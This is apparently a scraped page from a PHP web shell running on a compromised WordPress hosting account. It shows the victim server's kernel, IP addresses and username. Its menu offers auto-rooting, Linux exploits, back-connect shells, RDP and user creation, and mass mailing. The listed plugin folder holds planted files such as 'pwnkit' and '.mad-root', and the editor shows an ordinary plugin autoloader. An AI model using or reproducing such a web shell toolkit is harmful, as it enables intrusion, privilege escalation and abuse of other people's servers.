Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
plugins /
kali-forms /
[ HOME SHELL ]
Name
Size
Permission
Action
Inc
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
.editorconfig
470
B
-rw-r--r--
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
.prettierignore
6
B
-rw-r--r--
LICENSE
34.32
KB
-rw-r--r--
README.txt
16.18
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
autoloader.php
1.67
KB
-rw-r--r--
bootstrap.php
572
B
-rw-r--r--
jsconfig.json
60
B
-rw-r--r--
kali-forms.php
1.38
KB
-rw-r--r--
postcss.config.js
70
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : autoloader.php
<?php namespace KaliForms; if ( ! defined( 'ABSPATH' ) ) { die; } /** * Class KaliForms_Autoloader */ class KaliForms_Autoloader { /** * KaliForms_Autoloader constructor. */ public function __construct() { spl_autoload_register( [ $this, 'load' ] ); } /** * Load the class name * * @param string $filename */ public function load( $filename = '' ) { /** * Explode namespace * (SPL AUTOLOAD REGISTER receives something like Inc/KaliForms or Inc/Console/Command) */ $fp = explode( '\\', $filename ); $cf = $this->format_class_name( $fp ); /** * Get plugin root */ $path = trailingslashit( dirname( __FILE__ ) ); /** * Build path based on the explode from before */ for ( $i = 1; $i < count( $fp ) - 1; $i ++ ) { $path .= trailingslashit( $fp[ $i ] ); } /** * Append class name */ $path .= $cf; $this->include_file( $path ); } /** * Include file * * @param string $path */ public function include_file( $path = '' ) { /** * If it exists, include it. */ if ( file_exists( $path ) ) { include_once $path; } } /** * Formats the class name and returns it * * @param array $fp * * @return string */ public function format_class_name( $fp = [] ) { $cf = ''; /** * We need to get the last index, that's the class name */ if ( isset( $fp[ count( $fp ) - 1 ] ) ) { /** * turn it lowercase */ $cf = strtolower( $fp[ count( $fp ) - 1 ] ); /** * Format class file according to standards */ $cf = str_ireplace( '_', '-', $cf ); /** * prepend class- */ $cf = sprintf( 'class-%s.php', $cf ); } return $cf; } } new KaliForms_Autoloader();
Close